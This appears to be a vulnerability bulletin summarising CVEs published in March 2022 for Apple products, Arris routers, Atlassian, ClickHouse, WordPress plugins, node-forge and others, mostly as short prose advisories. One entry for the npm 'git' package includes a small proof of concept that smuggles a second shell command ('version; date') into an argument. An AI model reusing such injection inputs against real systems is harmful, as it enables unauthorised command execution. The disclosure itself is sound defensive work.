MISC apple — multiple_products A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to gain elevated privileges. 2022-03-18 not yet calculated CVE-2022-22617
MISC
MISC
MISC apple — multiple_products A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, Security Update 2022-003 Catalina, watchOS 8.5, macOS Monterey 12.3. An application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22615
MISC
MISC
MISC
MISC
MISC
MISC apple — multiple_products An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory. 2022-03-18 not yet calculated CVE-2022-22626
MISC
MISC
MISC apple — multiple_products An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory. 2022-03-18 not yet calculated CVE-2022-22625
MISC
MISC
MISC apple — multiple_products A memory consumption issue was addressed with improved memory handling. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, iTunes 12.12.3 for Windows, watchOS 8.5, macOS Monterey 12.3. Processing a maliciously crafted image may lead to heap corruption. 2022-03-18 not yet calculated CVE-2022-22612
MISC
MISC
MISC
MISC
MISC apple — multiple_products An out-of-bounds read was addressed with improved input validation. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, iTunes 12.12.3 for Windows, watchOS 8.5, macOS Monterey 12.3. Processing a maliciously crafted image may lead to arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22611
MISC
MISC
MISC
MISC
MISC apple — multiple_products This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. A plug-in may be able to inherit the application’s permissions and access user data. 2022-03-18 not yet calculated CVE-2022-22650
MISC
MISC
MISC apple — multiple_products The GSMA authentication panel could be presented on the lock screen. The issue was resolved by requiring device unlock to interact with the GSMA authentication panel. This issue is fixed in iOS 15.4 and iPadOS 15.4. A person with physical access may be able to view and modify the carrier account information and settings from the lock screen. 2022-03-18 not yet calculated CVE-2022-22652
MISC apple — multiple_products
  An authentication issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. A local attacker may be able to view the previous logged in user’s desktop from the fast user switching screen. 2022-03-18 not yet calculated CVE-2022-22656
MISC
MISC
MISC apple — multiple_products
  An out-of-bounds write was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.4, iOS 14.6 and iPadOS 14.6, watchOS 7.5, tvOS 14.6. Processing a maliciously crafted font file may lead to arbitrary code execution. 2022-03-18 not yet calculated CVE-2021-30771
MISC
MISC
MISC
MISC apple — multiple_products
  A validation issue was addressed with improved input sanitization. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing a maliciously crafted mail message may lead to running arbitrary javascript. 2022-03-18 not yet calculated CVE-2022-22589
MISC
MISC
MISC
MISC
MISC apple — multiple_products
  A logic issue was addressed with improved validation. This issue is fixed in tvOS 15.3, iOS 15.3 and iPadOS 15.3, watchOS 8.4, macOS Monterey 12.2. A malicious application may be able to gain root privileges. 2022-03-18 not yet calculated CVE-2022-22578
MISC
MISC
MISC
MISC apple — multiple_products
  An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, Security Update 2022-003 Catalina, watchOS 8.5, macOS Monterey 12.3. An application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22613
MISC
MISC
MISC
MISC
MISC
MISC apple — xcode An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22602
MISC apple — xcode An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22607
MISC apple — xcode An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22606
MISC apple — xcode An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22605
MISC apple — xcode An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22604
MISC apple — xcode An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22603
MISC apple — xcode
  An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22608
MISC apple — xcode
  An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22601
MISC archivista — dms
  Cross-site Scripting (XSS) vulnerability in ArchivistaBox webclient allows an attacker to craft a malicious link, executing JavaScript in the context of a victim’s browser. This issue affects all ArchivistaBox versions prior to 2022/I. 2022-03-16 not yet calculated CVE-2021-42552
CONFIRM argencoders-notevil — argencoders-notevil
  This affects all versions of package notevil; all versions of package argencoders-notevil. It is vulnerable to Sandbox Escape leading to Prototype pollution. The package fails to restrict access to the main context, allowing an attacker to add or modify an object’s prototype. **Note:** This vulnerability derives from an incomplete fix in [SNYK-JS-NOTEVIL-608878](https://security.snyk.io/vuln/SNYK-JS-NOTEVIL-608878). 2022-03-17 not yet calculated CVE-2021-23771
MISC
MISC ari_fancy_lightbox  — ari_fancy_lightbox
  The ARI Fancy Lightbox WordPress plugin before 1.3.9 does not sanitise and escape the msg parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting 2022-03-14 not yet calculated CVE-2022-0161
MISC
CONFIRM arm — cortex_and_neoverse_processors
  Certain Arm Cortex and Neoverse processors through 2022-03-08 do not properly restrict cache speculation, aka Spectre-BHB. An attacker can leverage the shared branch history in the Branch History Buffer (BHB) to influence mispredicted branches. Then, cache allocation can allow the attacker to obtain sensitive information. 2022-03-13 not yet calculated CVE-2022-23960
CONFIRM
MISC
MLIST arris — routers Arris routers SBR-AC1900P 1.0.7-B05, SBR-AC3200P 1.0.7-B05 and SBR-AC1200P 1.0.5-B05 were discovered to contain a command injection vulnerability in the firewall-local log function via the EmailAddress, SmtpServerName, SmtpUsername, and SmtpPassword parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26990
MISC arris — routers Arris routers SBR-AC1900P 1.0.7-B05, SBR-AC3200P 1.0.7-B05 and SBR-AC1200P 1.0.5-B05 were discovered to contain a command injection vulnerability in the ntp function via the TimeZone parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26991
MISC arris — routers Arris routers SBR-AC1900P 1.0.7-B05, SBR-AC3200P 1.0.7-B05 and SBR-AC1200P 1.0.5-B05 were discovered to contain a command injection vulnerability in the pppoe function via the pppoeUserName, pppoePassword, and pppoe_Service parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26993
MISC arris — routers Arris routers SBR-AC1900P 1.0.7-B05, SBR-AC3200P 1.0.7-B05 and SBR-AC1200P 1.0.5-B05 were discovered to contain a command injection vulnerability in the ddns function via the DdnsUserName, DdnsHostName, and DdnsPassword parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26992
MISC arris — routers
  Arris routers SBR-AC1900P 1.0.7-B05, SBR-AC3200P 1.0.7-B05 and SBR-AC1200P 1.0.5-B05 were discovered to contain a command injection vulnerability in the pptp function via the pptpUserName and pptpPassword parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26994
MISC arris — tr3300 Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the wps setting function via the wps_enrolee_pin parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26998
MISC arris — tr3300 Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the pptp (wan_pptp.html) function via the pptp_fix_ip, pptp_fix_mask, pptp_fix_gw, and wan_dns1_stat parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26995
MISC arris — tr3300 Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the pppoe function via the pppoe_username, pppoe_passwd, and pppoe_servicename parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26996
MISC arris — tr3300 Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the time and time zone function via the h_primary_ntp_server, h_backup_ntp_server, and h_time_zone parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-27000
MISC arris — tr3300 Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the upnp function via the upnp_ttl parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26997
MISC arris — tr3300 Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the static ip settings function via the wan_ip_stat, wan_mask_stat, wan_gw_stat, and wan_dns1_stat parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26999
MISC arris — tr3300 Arris TR3300 v1.0.13 were discovered to contain a command injection vulnerability in the dhcp function via the hostname parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-27001
MISC arris — tr3300
  Arris TR3300 v1.0.13 were discovered to contain a command injection vulnerability in the ddns function via the ddns_name, ddns_pwd, h_ddns?ddns_host parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-27002
MISC atlassian — fisheye_and_crucible The jQuery deserialize library in Fisheye and Crucible before version 4.8.9 allowed remote attackers to to inject arbitrary HTML and/or JavaScript via a prototype pollution vulnerability. 2022-03-16 not yet calculated CVE-2021-43956
MISC
MISC atlassian — fisheye_and_crucible Affected versions of Atlassian Fisheye & Crucible allowed remote attackers to browse local files via an Insecure Direct Object References (IDOR) vulnerability in the WEB-INF directory and bypass the fix for CVE-2020-29446 due to a lack of url decoding. The affected versions are before version 4.8.9. 2022-03-16 not yet calculated CVE-2021-43957
MISC
MISC atlassian — fisheye_and_crucible
  The /rest-service-fecru/server-v1 resource in Fisheye and Crucible before version 4.8.9 allowed authenticated remote attackers to obtain information about installation directories via information disclosure vulnerability. 2022-03-16 not yet calculated CVE-2021-43955
MISC
MISC atlassian — fisheye_and_crucible
  Various rest resources in Fisheye and Crucible before version 4.8.9 allowed remote attackers to brute force user login credentials as rest resources did not check if users were beyond their max failed login limits and therefore required solving a CAPTCHA in addition to providing user credentials for authentication via a improper restriction of excess authentication attempts vulnerability. 2022-03-16 not yet calculated CVE-2021-43958
MISC
MISC atom — cms
  Atom CMS v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the “A” parameter in /widgets/debug.php. 2022-03-15 not yet calculated CVE-2022-25489
MISC atom — cms
  Atom CMS v2.0 was discovered to contain a remote code execution (RCE) vulnerability via /admin/uploads.php. 2022-03-15 not yet calculated CVE-2022-25487
MISC atom — cms
  Atom CMS v2.0 was discovered to contain a SQL injection vulnerability via the id parameter in /admin/ajax/avatar.php. 2022-03-15 not yet calculated CVE-2022-25488
MISC automotive_grade_linux_kooky_koi — automotive_grade_linux_kooky_koi
  Automotive Grade Linux Kooky Koi 11.0.0, 11.0.1, 11.0.2, 11.0.3, 11.0.4, and 11.0.5 is affected by Incorrect Access Control in usr/bin/afb-daemon. To exploit the vulnerability, an attacker should send a well-crafted HTTP (or WebSocket) request to the socket listened by the afb-daemon process. No credentials nor user interactions are required. 2022-03-18 not yet calculated CVE-2022-24595
MISC axeda — agent_and_desktop_server_for_windows Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) uses hard-coded credentials for its UltraVNC installation. Successful exploitation of this vulnerability could allow a remote authenticated attacker to take full remote control of the host operating system. 2022-03-16 not yet calculated CVE-2022-25246
MISC
MISC axeda — agent_and_desktop_server_for_windows Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) may allow an attacker to send certain commands to a specific port without authentication. Successful exploitation of this vulnerability could allow a remote unauthenticated attacker to obtain full file-system access and remote code execution. 2022-03-16 not yet calculated CVE-2022-25247
MISC
MISC axeda — agent_and_desktop_server_for_windows When connecting to a certain port Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) may allow an attacker to send a certain command to a specific port without authentication. Successful exploitation of this vulnerability could allow a remote unauthenticated attacker to shut down a specific service. 2022-03-16 not yet calculated CVE-2022-25250
MISC
MISC axeda — agent_and_desktop_server_for_windows When connecting to a certain port Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) supplies the event log of the specific service. 2022-03-16 not yet calculated CVE-2022-25248
MISC
MISC axeda — agent_and_desktop_server_for_windows When connecting to a certain port Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) (disregarding Axeda agent v6.9.2 and v6.9.3) is vulnerable to directory traversal, which could allow a remote unauthenticated attacker to obtain file system read access via web server.. 2022-03-16 not yet calculated CVE-2022-25249
MISC
MISC axeda — agent_and_desktop_server_for_windows When connecting to a certain port Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) may allow an attacker to send certain XML messages to a specific port without proper authentication. Successful exploitation of this vulnerability could allow a remote unauthenticated attacker to read and modify the affected product’s configuration. 2022-03-16 not yet calculated CVE-2022-25251
MISC
MISC axeda — agent_and_desktop_server_for_windows
  When connecting to a certain port Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) when receiving certain input throws an exception. Services using said function do not handle the exception. Successful exploitation of this vulnerability could allow a remote unauthenticated attacker to crash the affected product. 2022-03-16 not yet calculated CVE-2022-25252
MISC
MISC bareos — bareos Bareos is open source software for backup, archiving, and recovery of data for operating systems. When Bareos Director >= 18.2 but prior to 21.1.0, 20.0.6, and 19.2.12 is built and configured for PAM authentication, a failed PAM authentication will leak a small amount of memory. An attacker that is able to use the PAM Console (i.e. by knowing the shared secret or via the WebUI) can flood the Director with failing login attempts which will eventually lead to an out-of-memory condition in which the Director will not work anymore. Bareos Director versions 21.1.0, 20.0.6 and 19.2.12 contain a Bugfix for this problem. Users who are unable to upgrade may disable PAM authentication as a workaround. 2022-03-15 not yet calculated CVE-2022-24756
MISC
CONFIRM
MISC
MISC
MISC bareos — bareos
  Bareos is open source software for backup, archiving, and recovery of data for operating systems. When Bareos Director >= 18.2 >= 18.2 but prior to 21.1.0, 20.0.6, and 19.2.12 is built and configured for PAM authentication, it will skip authorization checks completely. Expired accounts and accounts with expired passwords can still login. This problem will affect users that have PAM enabled. Currently there is no authorization (e.g. check for expired or disabled accounts), but only plain authentication (i.e. check if username and password match). Bareos Director versions 21.1.0, 20.0.6 and 19.2.12 implement the authorization check that was previously missing. The only workaround is to make sure that authentication fails if the user is not authorized. 2022-03-15 not yet calculated CVE-2022-24755
MISC
MISC
MISC
CONFIRM
MISC bitbucket_pipeline_variable — bitbucket_pipeline_variable
  A flaw was found in ansible module where credentials are disclosed in the console log by default and not protected by the security feature when using the bitbucket_pipeline_variable module. This flaw allows an attacker to steal bitbucket_pipeline credentials. The highest threat from this vulnerability is to confidentiality. 2022-03-16 not yet calculated CVE-2021-20180
MISC bodymen — bodymen
  The package bodymen from 0.0.0 are vulnerable to Prototype Pollution via the handler function which could be tricked into adding or modifying properties of Object.prototype using a __proto__ payload. **Note:** This vulnerability derives from an incomplete fix to [CVE-2019-10792](https://security.snyk.io/vuln/SNYK-JS-BODYMEN-548897) 2022-03-17 not yet calculated CVE-2022-25296
MISC braintree — sanitizeurl
  The package @braintree/sanitize-url before 6.0.0 are vulnerable to Cross-site Scripting (XSS) due to improper sanitization in sanitizeUrl function. 2022-03-16 not yet calculated CVE-2021-23648
MISC
MISC
MISC
MISC brocade — fabric_os
  A vulnerability in the Brocade Fabric OS before Brocade Fabric OS v9.0.1a, v8.2.3, v8.2.0_CBN4, and v7.4.2h could allow an authenticated CLI user to abuse the history command to write arbitrary content to files. 2022-03-18 not yet calculated CVE-2020-15388
MISC brocade — fabric_os
  The Web application of Brocade Fabric OS before versions Brocade Fabric OS v9.0.1a and v8.2.3a contains debug statements that expose sensitive information to the program’s standard output device. An attacker who has compromised the FOS system may utilize this weakness to capture sensitive information, such as user credentials. 2022-03-18 not yet calculated CVE-2021-27789
MISC chainsafe — libp2p-noise
  `@chainsafe/libp2p-noise` contains TypeScript implementation of noise protocol, an encryption protocol used in libp2p. `@chainsafe/libp2p-noise` before 4.1.2 and 5.0.3 does not correctly validate signatures during the handshake process. This may allow a man-in-the-middle to pose as other peers and get those peers banned. Users should upgrade to version 4.1.2 or 5.0.3 to receive a patch. There are currently no known workarounds. 2022-03-17 not yet calculated CVE-2022-24759
MISC
MISC
CONFIRM ckeditor4 — ckeditor4 CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. CKEditor4 prior to version 4.18.0 contains a vulnerability in the `dialog` plugin. The vulnerability allows abuse of a dialog input validator regular expression, which can cause a significant performance drop resulting in a browser tab freeze. A patch is available in version 4.18.0. There are currently no known workarounds. 2022-03-16 not yet calculated CVE-2022-24729
MISC
CONFIRM
CONFIRM ckeditor4 — ckeditor4
  CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. A vulnerability has been discovered in the core HTML processing module and may affect all plugins used by CKEditor 4 prior to version 4.18.0. The vulnerability allows someone to inject malformed HTML bypassing content sanitization, which could result in executing JavaScript code. This problem has been patched in version 4.18.0. There are currently no known workarounds. 2022-03-16 not yet calculated CVE-2022-24728
MISC
CONFIRM
MISC
CONFIRM classcms — classcms
  Classcms v2.5 and below contains an arbitrary file upload via the component classclassupload. This vulnerability allows attackers to execute code injection via a crafted .txt file. 2022-03-18 not yet calculated CVE-2022-25581
MISC clickhouse — dbms Heap buffer overflow in Clickhouse’s LZ4 compression codec when parsing a malicious query. There is no verification that the copy operations in the LZ4::decompressImpl loop and especially the arbitrary copy operation wildCopy<copy_amount>(op, ip, copy_end), don’t exceed the destination buffer’s limits. This issue is very similar to CVE-2021-43304, but the vulnerable copy operation is in a different wildCopy call. 2022-03-14 not yet calculated CVE-2021-43305
MISC clickhouse — dbms Divide-by-zero in Clickhouse’s Gorilla compression codec when parsing a malicious query. The first byte of the compressed buffer is used in a modulo operation without being checked for 0. 2022-03-14 not yet calculated CVE-2021-42391
MISC clickhouse — dbms Divide-by-zero in Clickhouse’s Delta compression codec when parsing a malicious query. The first byte of the compressed buffer is used in a modulo operation without being checked for 0. 2022-03-14 not yet calculated CVE-2021-42389
MISC clickhouse — dbms Heap out-of-bounds read in Clickhouse’s LZ4 compression codec when parsing a malicious query. As part of the LZ4::decompressImpl() loop, a 16-bit unsigned user-supplied value (‘offset’) is read from the compressed data. The offset is later used in the length of a copy operation, without checking the lower bounds of the source of the copy operation. 2022-03-14 not yet calculated CVE-2021-42388
MISC clickhouse — dbms Divide-by-zero in Clickhouse’s DeltaDouble compression codec when parsing a malicious query. The first byte of the compressed buffer is used in a modulo operation without being checked for 0. 2022-03-14 not yet calculated CVE-2021-42390
MISC clickhouse — dbms
  Heap buffer overflow in Clickhouse’s LZ4 compression codec when parsing a malicious query. There is no verification that the copy operations in the LZ4::decompressImpl loop and especially the arbitrary copy operation wildCopy<copy_amount>(op, ip, copy_end), don’t exceed the destination buffer’s limits. 2022-03-14 not yet calculated CVE-2021-43304
MISC clickhouse — dbms
  Heap out-of-bounds read in Clickhouse’s LZ4 compression codec when parsing a malicious query. As part of the LZ4::decompressImpl() loop, a 16-bit unsigned user-supplied value (‘offset’) is read from the compressed data. The offset is later used in the length of a copy operation, without checking the upper bounds of the source of the copy operation. 2022-03-14 not yet calculated CVE-2021-42387
MISC cometd — cometd
  CometD is a scalable comet implementation for web messaging. In any version prior to 5.0.11, 6.0.6, and 7.0.6, internal usage of Oort and Seti channels is improperly authorized, so any remote user could subscribe and publish to those channels. By subscribing to those channels, a remote user may be able to watch cluster-internal traffic that contains other users’ (possibly sensitive) data. By publishing to those channels, a remote user may be able to create/modify/delete other user’s data and modify the cluster structure. A fix is available in versions 5.0.11, 6.0.6, and 7.0.6. As a workaround, install a custom `SecurityPolicy` that forbids subscription and publishing to remote, non-Oort, sessions on Oort and Seti channels. 2022-03-15 not yet calculated CVE-2022-24721
MISC
CONFIRM commonsbooking — commonsbooking
  The CommonsBooking WordPress plugin before 2.6.8 does not sanitise and escape the location parameter of the calendar_data AJAX action (available to unauthenticated users) before it is used in dynamically constructed SQL queries, leading to an unauthenticated SQL injection 2022-03-14 not yet calculated CVE-2022-0658
MISC contact_form_x — contact_form_x
  Reflected Cross-Site Scripting (XSS) vulnerability affecting parameter &tab discovered in Contact Form X WordPress plugin (versions <= 2.4). 2022-03-11 not yet calculated CVE-2022-25601
CONFIRM
CONFIRM
FEDORA
FEDORA contao — managed_edition
  Contao Managed Edition v1.5.0 was discovered to contain a remote command execution (RCE) vulnerability via the component php_cli parameter. 2022-03-18 not yet calculated CVE-2022-26265
MISC countdown_coming_soon — countdown_coming_soon
  The Countdown, Coming Soon, Maintenance WordPress plugin before 2.2.9 does not sanitize and escape the post parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting. 2022-03-14 not yet calculated CVE-2022-0601
CONFIRM
MISC cri-o — cri-o
  A flaw was found in CRI-O in the way it set kernel options for a pod. This issue allows anyone with rights to deploy a pod on a Kubernetes cluster that uses the CRI-O runtime to achieve a container escape and arbitrary code execution as root on the cluster node, where the malicious pod was deployed. 2022-03-16 not yet calculated CVE-2022-0811
MISC
MISC cuppacms — cuppacms CuppaCMS v1.0 was discovered to contain a remote code execution (RCE) vulnerability via the saveConfigData function in /classes/ajax/Functions.php. 2022-03-15 not yet calculated CVE-2022-25498
MISC cuppacms — cuppacms CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertLightbox.php. 2022-03-15 not yet calculated CVE-2022-25485
MISC cuppacms — cuppacms The component /jquery_file_upload/server/php/index.php of CuppaCMS v1.0 allows attackers to upload arbitrary files and execute arbitrary code via a crafted PHP file. 2022-03-15 not yet calculated CVE-2022-25495
MISC cuppacms — cuppacms
  CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php. 2022-03-15 not yet calculated CVE-2022-25486
MISC cuppacms — cuppacms
  CuppaCMS v1.0 was discovered to contain an arbitrary file read via the copy function. 2022-03-15 not yet calculated CVE-2022-25497
MISC cvrf-csaf-converter –cvrf-csaf-converter
  CVRF-CSAF-Converter before 1.0.0-rc2 resolves XML External Entities (XXE). This leads to the inclusion of arbitrary (local) file content into the generated output document. An attacker can exploit this to disclose information from the system running the converter. 2022-03-15 not yet calculated CVE-2022-27193
MISC dcn_firewall — dcme-520 DCN Firewall DCME-520 was discovered to contain an arbitrary file download vulnerability via the path parameter in the file /audit/log/log_management.php. 2022-03-18 not yet calculated CVE-2022-25389
MISC dcn_firewall — dcme-520
  DCN Firewall DCME-520 was discovered to contain a remote command execution (RCE) vulnerability via the host parameter in the file /system/tool/ping.php. 2022-03-18 not yet calculated CVE-2022-25390
MISC delete_marker_category_delete_map_and_copy_map — delete_marker_category_delete_map_and_copy_map
  Cross-Site Request Forgery (CSRF) vulnerability affecting Delete Marker Category, Delete Map, and Copy Map functions in WP Google Map plugin (versions <= 4.2.3). 2022-03-11 not yet calculated CVE-2022-25600
CONFIRM
CONFIRM
FEDORA
FEDORA eos — eos
  EOS v2.1.0 was discovered to contain a heap-buffer-overflow via the function txn_test_gen_plugin. 2022-03-17 not yet calculated CVE-2022-26300
MISC event_manager_and_tickets_selling_for_woocommerce — event_manager_and_tickets_selling_for_woocommerce
  The Event Manager and Tickets Selling for WooCommerce WordPress plugin before 3.5.8 does not validate and escape the post_author_gutenberg parameter before using it in a SQL statement when creating/editing events, which could allow users with a role as low as contributor to perform SQL Injection attacks 2022-03-14 not yet calculated CVE-2022-0478
CONFIRM
MISC fasthttp — fasthttp
  The package github.com/valyala/fasthttp before 1.34.0 are vulnerable to Directory Traversal via the ServeFile function, due to improper sanitization. It is possible to be exploited by using a backslash %5c character in the path. **Note:** This security issue impacts Windows users only. 2022-03-17 not yet calculated CVE-2022-21221
MISC
MISC
MISC
MISC
MISC fexsrv — fexsrv
  fexsrv in F*EX (aka Frams’ Fast File EXchange) before fex-20160919_2 allows eval injection (for unauthenticated remote code execution). 2022-03-17 not yet calculated CVE-2020-15591
MISC
CONFIRM fisco-bcos –fisco-bcos
  FISCO-BCOS release-3.0.0-rc2 was discovered to contain an issue where a malicious node, via a malicious viewchange packet, will cause normal nodes to change view excessively and stop generating blocks. 2022-03-17 not yet calculated CVE-2022-26534
MISC fish — fish
  fish is a command line shell. fish version 3.1.0 through version 3.3.1 is vulnerable to arbitrary code execution. git repositories can contain per-repository configuration that change the behavior of git, including running arbitrary commands. When using the default configuration of fish, changing to a directory automatically runs `git` commands in order to display information about the current repository in the prompt. If an attacker can convince a user to change their current directory into one controlled by the attacker, such as on a shared file system or extracted archive, fish will run arbitrary commands under the attacker’s control. This problem has been fixed in fish 3.4.0. Note that running git in these directories, including using the git tab completion, remains a potential trigger for this issue. As a workaround, remove the `fish_git_prompt` function from the prompt. 2022-03-14 not yet calculated CVE-2022-20001
MISC
CONFIRM
MISC flexi — flexi
  The Flexi WordPress plugin before 4.20 does not sanitise and escape various parameters before outputting them back in some pages such as the user dashboard, leading to a Reflected Cross-Site Scripting 2022-03-14 not yet calculated CVE-2022-0449
MISC forge — forge Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code does not check for tailing garbage bytes after decoding a `DigestInfo` ASN.1 structure. This can allow padding bytes to be removed and garbage data added to forge a signature when a low public exponent is being used. The issue has been addressed in `node-forge` version 1.3.0. There are currently no known workarounds. 2022-03-18 not yet calculated CVE-2022-24772
MISC
MISC
CONFIRM forge — forge Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code is lenient in checking the digest algorithm structure. This can allow a crafted structure that steals padding bytes and uses unchecked portion of the PKCS#1 encoded message to forge a signature when a low public exponent is being used. The issue has been addressed in `node-forge` version 1.3.0. There are currently no known workarounds. 2022-03-18 not yet calculated CVE-2022-24771
CONFIRM
MISC forge — forge
  Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code does not properly check `DigestInfo` for a proper ASN.1 structure. This can lead to successful verification with signatures that contain invalid structures but a valid digest. The issue has been addressed in `node-forge` version 1.3.0. There are currently no known workarounds. 2022-03-18 not yet calculated CVE-2022-24773
MISC
CONFIRM
MISC fuxa — fuxa
  A Server-Side Request Forgery (SSRF) attack in FUXA 1.1.3 can be carried out leading to the obtaining of sensitive information from the server’s internal environment and services, often potentially leading to the attacker executing commands on the server. 2022-03-16 not yet calculated CVE-2021-45851
MISC fv_flowplayer_video_player — fv_flowplayer_video_player
  Authenticated (author or higher user role) SQL Injection (SQLi) vulnerability discovered in FV Flowplayer Video Player WordPress plugin (versions <= 7.5.15.727). 2022-03-18 not yet calculated CVE-2022-25607
CONFIRM
CONFIRM gd_mylist — gd_mylist
  The GD Mylist WordPress plugin through 1.1.1 does not sanitise and escape some of its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed 2022-03-14 not yet calculated CVE-2022-0703
MISC ge — reason_clocks A code injection vulnerability exists in one of the webpages in GE Reason RT430, RT431 & RT434 GNSS clocks in firmware versions prior to version 08A06 that could allow an authenticated remote attacker to execute arbitrary code on the system. 2022-03-18 not yet calculated CVE-2020-25197
CONFIRM
CONFIRM ge — reason_clocks
  By having access to the hard-coded cryptographic key for GE Reason RT430, RT431 & RT434 GNSS clocks in firmware versions prior to version 08A06, attackers would be able to intercept and decrypt encrypted traffic through an HTTPS connection. 2022-03-18 not yet calculated CVE-2020-25193
CONFIRM
CONFIRM getgrav — grav
  Cross-site Scripting (XSS) – Stored in GitHub repository getgrav/grav prior to 1.7.31. 2022-03-15 not yet calculated CVE-2022-0970
MISC
CONFIRM git — git
  All versions of package git are vulnerable to Remote Code Execution (RCE) due to missing sanitization in the Git.git method, which allows execution of OS commands rather than just git commands. Steps to Reproduce 1. Create a file named exploit.js with the following content: js var Git = require(“git”).Git; var repo = new Git(“repo-test”); var user_input = “version; date”; repo.git(user_input, function(err, result) { console.log(result); }) 2. In the same directory as exploit.js, run npm install git. 3. Run exploit.js: node exploit.js. You should see the outputs of both the git version and date command-lines. Note that the repo-test Git repository does not need to be present to make this PoC work. 2022-03-17 not yet calculated CVE-2021-23632
MISC gitea — gitea
